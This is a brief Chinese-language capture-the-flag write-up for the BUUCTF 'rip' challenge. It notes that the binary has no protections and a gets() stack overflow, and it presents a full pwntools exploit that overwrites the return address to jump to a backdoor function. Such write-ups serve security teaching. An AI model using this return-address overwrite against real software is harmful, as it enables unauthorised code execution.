[BUU-WriteUp]rip

rip

使用checksec查看:
[BUU-WriteUp]rip
保护措施全部关闭。

放进IDA中分析:
[BUU-WriteUp]rip

  • gets():存在栈溢出

fun()
[BUU-WriteUp]rip

  • 存在后门函数

步骤解析

s 距离 rbp 0xF,无canary,直接覆盖即可

完整exp

from pwn import *

p = process("../buu/rip")
# p = remote("node4.buuoj.cn",27965)

elf = ELF("../buu/rip")
fun_addr = elf.symbols['fun']
payload = b'M' * (0xF + 8) + p64(fun_addr-1) +p64(fun_addr)
p.sendline(payload)

p.interactive()
上一篇:2021-08-04


下一篇:创建vue工程,使用elementUI